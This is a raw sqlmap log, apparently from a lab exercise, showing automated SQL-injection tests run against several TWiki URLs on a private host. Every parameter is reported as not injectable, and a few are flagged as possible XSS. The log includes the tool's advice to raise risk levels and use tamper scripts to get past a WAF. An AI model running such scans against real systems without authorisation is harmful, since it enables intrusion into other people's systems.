[20:20:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:20:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:20:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:20:42] [INFO] testing 'Oracle AND time-based blind' | |
[20:20:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:20:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:20:54] [WARNING] GET parameter 'rev2' is not injectable | |
[20:20:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 192: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:20:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.3' | |
[20:20:54] [INFO] testing connection to the target URL | |
[20:20:55] [INFO] testing if the target URL is stable | |
[20:20:56] [INFO] target URL is stable | |
[20:20:56] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:20:56] [INFO] confirming that GET parameter 'rev' is dynamic | |
[20:20:56] [INFO] GET parameter 'rev' is dynamic | |
[20:20:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:20:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:20:56] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:20:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:20:56] [WARNING] reflective value(s) found and filtering out | |
[20:20:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:20:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:20:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:20:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:20:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:21:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:21:00] [INFO] testing 'MySQL inline queries' | |
[20:21:00] [INFO] testing 'PostgreSQL inline queries' | |
[20:21:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:21:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:21:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:21:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:21:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:21:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:21:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:21:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:21:03] [INFO] testing 'Oracle AND time-based blind' | |
[20:21:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:21:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:21:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:21:16] [WARNING] GET parameter 'rev' is not injectable | |
[20:21:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:21:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.3&rev2=1.2' | |
[20:21:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.2' | |
URL 193: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.4¶m2=1.4 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:21:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.4¶m2=1.4' | |
[20:21:16] [INFO] testing connection to the target URL | |
[20:21:16] [INFO] testing if the target URL is stable | |
[20:21:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:21:17] [INFO] testing if GET parameter 'template' is dynamic | |
[20:21:17] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:21:17] [INFO] GET parameter 'template' is dynamic | |
[20:21:17] [INFO] heuristics detected web page charset 'ascii' | |
[20:21:17] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:21:17] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:21:17] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:21:17] [WARNING] reflective value(s) found and filtering out | |
[20:21:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:21:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:21:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:21:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:21:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:21:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:21:20] [INFO] testing 'MySQL inline queries' | |
[20:21:20] [INFO] testing 'PostgreSQL inline queries' | |
[20:21:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:21:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:21:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:21:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:21:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:21:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:21:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:21:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:21:23] [INFO] testing 'Oracle AND time-based blind' | |
[20:21:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:21:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:21:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:21:32] [WARNING] GET parameter 'template' is not injectable | |
[20:21:32] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:21:32] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:21:32] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:21:33] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:21:33] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:21:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:21:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:21:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:21:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:21:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:21:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:21:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:21:36] [INFO] testing 'MySQL inline queries' | |
[20:21:36] [INFO] testing 'PostgreSQL inline queries' | |
[20:21:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:21:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:21:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:21:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:21:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:21:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:21:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:21:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:21:40] [INFO] testing 'Oracle AND time-based blind' | |
[20:21:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:21:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:21:53] [WARNING] GET parameter 'param1' is not injectable | |
[20:21:53] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:21:53] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:21:53] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:21:53] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:21:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:21:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:21:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:21:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:21:57] [INFO] testing 'MySQL inline queries' | |
[20:21:57] [INFO] testing 'PostgreSQL inline queries' | |
[20:21:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:21:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:21:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:21:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:21:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:21:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:22:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:22:00] [INFO] testing 'Oracle AND time-based blind' | |
[20:22:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:22:10] [INFO] target URL appears to be UNION injectable with 10 columns | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[20:22:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[20:22:17] [WARNING] GET parameter 'param2' is not injectable | |
[20:22:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 194: | |
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=\.* | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:22:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=\.*' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:22:17] [INFO] testing connection to the target URL | |
[20:22:17] [INFO] testing if the target URL is stable | |
[20:22:18] [INFO] target URL is stable | |
[20:22:18] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:22:18] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:22:18] [INFO] URI parameter '#1*' is dynamic | |
[20:22:18] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:22:18] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:22:18] [WARNING] reflective value(s) found and filtering out | |
[20:22:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:22:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:22:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:22:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:22:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:22:22] [INFO] testing 'MySQL inline queries' | |
[20:22:22] [INFO] testing 'PostgreSQL inline queries' | |
[20:22:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:22:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:22:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:22:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:22:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:22:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:22:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:22:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:22:25] [INFO] testing 'Oracle AND time-based blind' | |
[20:22:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:22:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:22:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:22:36] [WARNING] URI parameter '#1*' is not injectable | |
[20:22:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 195: | |
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^a | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:22:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^a' | |
[20:22:36] [INFO] testing connection to the target URL | |
[20:22:37] [INFO] testing if the target URL is stable | |
[20:22:38] [INFO] target URL is stable | |
[20:22:38] [INFO] testing if GET parameter 'scope' is dynamic | |
[20:22:38] [WARNING] GET parameter 'scope' does not appear dynamic | |
[20:22:38] [WARNING] heuristic (basic) test shows that GET parameter 'scope' might not be injectable | |
[20:22:38] [INFO] testing for SQL injection on GET parameter 'scope' | |
[20:22:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:22:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:22:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:22:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:22:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:22:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:22:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:22:41] [INFO] testing 'MySQL inline queries' | |
[20:22:41] [INFO] testing 'PostgreSQL inline queries' | |
[20:22:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:22:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:22:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:22:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:22:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:22:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:22:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:22:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:22:44] [INFO] testing 'Oracle AND time-based blind' | |
[20:22:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:22:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:22:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:22:56] [WARNING] GET parameter 'scope' is not injectable | |
[20:22:56] [INFO] testing if GET parameter 'regex' is dynamic | |
[20:22:57] [WARNING] GET parameter 'regex' does not appear dynamic | |
[20:22:57] [WARNING] heuristic (basic) test shows that GET parameter 'regex' might not be injectable | |
[20:22:57] [INFO] testing for SQL injection on GET parameter 'regex' | |
[20:22:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:22:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:22:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:22:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:22:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:23:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:23:00] [INFO] testing 'MySQL inline queries' | |
[20:23:00] [INFO] testing 'PostgreSQL inline queries' | |
[20:23:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:23:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:23:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:23:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:23:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:23:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:23:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:23:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:23:04] [INFO] testing 'Oracle AND time-based blind' | |
[20:23:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:23:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:23:16] [WARNING] GET parameter 'regex' is not injectable | |
[20:23:16] [INFO] testing if GET parameter 'search' is dynamic | |
[20:23:16] [WARNING] GET parameter 'search' does not appear dynamic | |
[20:23:16] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable | |
[20:23:16] [INFO] testing for SQL injection on GET parameter 'search' | |
[20:23:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:23:16] [WARNING] reflective value(s) found and filtering out | |
[20:23:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:23:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:23:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:23:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:23:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:23:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:23:20] [INFO] testing 'MySQL inline queries' | |
[20:23:20] [INFO] testing 'PostgreSQL inline queries' | |
[20:23:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:23:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:23:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:23:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:23:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:23:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:23:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:23:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:23:23] [INFO] testing 'Oracle AND time-based blind' | |
[20:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:23:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:23:35] [WARNING] GET parameter 'search' is not injectable | |
[20:23:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^b' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^c' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^d' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^e' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^f' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^g' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^h' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^i' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^j' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^k' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^l' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^m' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^n' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^o' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^p' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^q' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^r' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^s' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^t' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^u' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^v' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^w' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^x' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^y' | |
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&search=^z' | |
URL 196: | |
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&bookview=on&search=\.* | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:23:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic®ex=on&bookview=on&search=\.*' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:23:35] [INFO] testing connection to the target URL | |
[20:23:36] [INFO] testing if the target URL is stable | |
[20:23:37] [INFO] target URL is stable | |
[20:23:37] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:23:37] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:23:37] [INFO] URI parameter '#1*' is dynamic | |
[20:23:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:23:37] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:23:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:23:37] [WARNING] reflective value(s) found and filtering out | |
[20:23:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:23:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:23:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:23:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:23:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:23:41] [INFO] testing 'MySQL inline queries' | |
[20:23:41] [INFO] testing 'PostgreSQL inline queries' | |
[20:23:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:23:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:23:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:23:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:23:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:23:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:23:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:23:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:23:44] [INFO] testing 'Oracle AND time-based blind' | |
[20:23:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:23:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:23:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:23:56] [WARNING] URI parameter '#1*' is not injectable | |
[20:23:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 197: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebSearch?t=1441457856 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:23:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebSearch?t=1441457856' | |
[20:23:56] [INFO] testing connection to the target URL | |
[20:23:57] [INFO] testing if the target URL is stable | |
[20:23:57] [INFO] target URL is stable | |
[20:23:57] [INFO] testing if GET parameter 't' is dynamic | |
[20:23:57] [WARNING] GET parameter 't' does not appear dynamic | |
[20:23:58] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:23:58] [INFO] testing for SQL injection on GET parameter 't' | |
[20:23:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:23:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:23:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
